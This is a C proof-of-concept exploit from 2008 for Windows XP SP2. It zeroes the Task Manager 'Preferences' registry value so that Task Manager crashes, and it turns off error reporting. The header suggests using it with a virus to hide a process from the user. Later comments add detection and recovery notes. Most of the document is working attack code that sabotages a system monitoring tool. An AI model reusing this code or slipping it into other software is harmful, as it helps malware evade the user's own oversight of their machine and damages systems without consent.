Exploit demonstrating how manipulating a registry value in Microsoft Windows XP SP2 can disable the Task Manager.
72924758a2cd7b2bee11688185242cfe21c6a2f799feebfdf44715eaa66f897b
#include <windows.h>
/*
-=- Credits -=-
Coded by: SkyOut
Found by: Izee
Date: March 2008
Website: https://core-security.net/
-=- Timeline -=-
Discovering the bug: December 2006
Exploit coded: December 2006
[... over one year of waiting ...]
Phone call with Microsoft Germany: February 2008
Email sent to Microsoft Germany: February 2008
[... several weeks of waiting ...]
[... no reaction by Microsoft Germany ...]
Public release: March 2008
-=- Description -=-
By zeroing a REG_BINARY value in the Registry you can
disable the Taskmanager of Windows XP SP2. It will crash
on next startup.
-=- Possible way of using it -=-
Using this code together with a virus makes it possible to
hide your process from the user (unless he knows how to use
the Registry properly and can repair it manually, or has
a backup of this key).
-=- Tested on -=-
Windows XP SP2 (works)
Windows Vista SP0 (fixed)
*/
#pragma comment(lib, "advapi32.lib")
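/*
 * TaskmngrDisableBug - proof of concept for the Task Manager "Preferences" crash.
 *
 * Performs two registry writes, each on a best-effort basis:
 *
 *   1. HKCU\Software\Microsoft\Windows NT\CurrentVersion\TaskManager
 *      value "Preferences" (REG_BINARY) is overwritten with an all-zero
 *      buffer. Per the file header, Task Manager on Windows XP SP2 then
 *      crashes on its next start; Windows Vista is listed as fixed.
 *
 *   2. HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting
 *      value "DoReport" (REG_DWORD) is set to 0.
 *      NOTE(review): presumably this switches off error reporting so the
 *      crash produces no report prompt - confirm against the XP documentation.
 *      The HKLM key normally needs administrative rights to open for writing,
 *      so for a standard user this second step is expected to fail.
 *
 * Defender notes: a write to either value by a process that is not part of
 * the operating system is a useful detection signal; registry auditing or
 * endpoint registry telemetry on these two paths would surface it. For
 * recovery, restore "Preferences" from a backup or delete the value;
 * Task Manager is expected to recreate its defaults (verify on the
 * affected build).
 *
 * Takes no arguments and returns nothing; failures are silently skipped.
 */
void TaskmngrDisableBug(void)
{
    HKEY hKey;
    DWORD dwData = 0;
    BYTE bBuff[] = {00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00};

    /*
     * hKey is only written by a successful RegOpenKeyEx. The original code
     * ignored the result and passed an uninitialized handle on to
     * RegSetValueEx/RegCloseKey when the open failed, so each open is now
     * checked before the handle is used.
     */
    if (RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows NT\\CurrentVersion\\TaskManager", 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
        RegSetValueEx(hKey, "Preferences", 0, REG_BINARY, bBuff, sizeof(bBuff));
        RegCloseKey(hKey);
    }

    /* Independent of the first step: attempted even if the HKCU write was skipped. */
    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\PCHealth\\ErrorReporting", 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
        RegSetValueEx(hKey, "DoReport", 0, REG_DWORD, (LPBYTE)&dwData, sizeof(DWORD));
        RegCloseKey(hKey);
    }
}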
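/*
 * WinMain - program entry point.
 *
 * Calls TaskmngrDisableBug() once and exits. None of the standard WinMain
 * arguments are used.
 *
 * Returns 0. The original fell off the end of this int-returning function,
 * which left the process exit code unspecified.
 */
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, int iCmdShow)
{
    /* Silence unused-parameter warnings; the signature is fixed by the platform. */
    (void)hInstance;
    (void)hPrevInstance;
    (void)szCmdLine;
    (void)iCmdShow;

    TaskmngrDisableBug();
    return 0;
}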